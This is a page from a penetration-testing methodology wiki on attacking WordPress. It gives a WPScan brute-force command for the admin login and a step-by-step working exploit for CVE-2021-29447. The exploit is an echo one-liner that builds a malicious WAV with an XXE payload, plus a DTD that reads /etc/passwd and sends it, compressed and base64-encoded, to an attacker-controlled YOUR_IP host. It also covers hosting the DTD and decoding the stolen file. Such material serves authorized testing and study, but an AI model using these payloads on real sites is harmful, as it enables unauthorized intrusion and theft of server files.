TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page
  • Enumeration
  • CVE-2021-29447 / Authenticated XXE & SSRF

Was this helpful?

  1. External Recon
  2. Web Recon
  3. CMS

Wordpress

Generic methodologies and some CVEs

PreviousCMSNextPath traversal & LFI/RFI

Last updated 3 years ago

Was this helpful?

Enumeration

WPScan is the go-to tool for scanning a Wordpress application. It is also relatively important to grab an API key for it also and configure your wpscan installation to use it.

Wp-Login Brute Force

wpscan --url victim.ip -U admin --passwords passlist

CVE-2021-29447 / Authenticated XXE & SSRF

If you have media upload rights and if your Wpscan return this vulnerability. You are in for a treat. It is possible to upload a malicious WAV

Using echo and its parameters to escape backslashes and no trail lines, use this one liner to create a malicious WAV file.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:YOUR_PORT/malicious.dtd'"'"'>%remote;%init;%trick;]>\x00' > malicious.wav

On your box, create the malicious.dtd file and prepare yourself to upload this file to the server. The content of the malicious file should be like this: replace 

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd"> 
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOUR_IP:YOUR_PORT/malicious.dtd?p=%file;'>" >

  1. Use PHP to host malicious.dtd

  2. Upload malicious.wav

php -S YOUR_IP:YOUR_PORT

As soon as you upload the malicious.wav, your php web server should request a GET request with p as the parameter. Said parameter should hold the requested server file, encoded as zlib(base64).

And then you can use php to decode it.

<?php echo zlib_decode(base64_decode('b64-to-decode')); ?>

WPScan snippet of scan
Base64 dump of the /etc/passwd on Wordpress server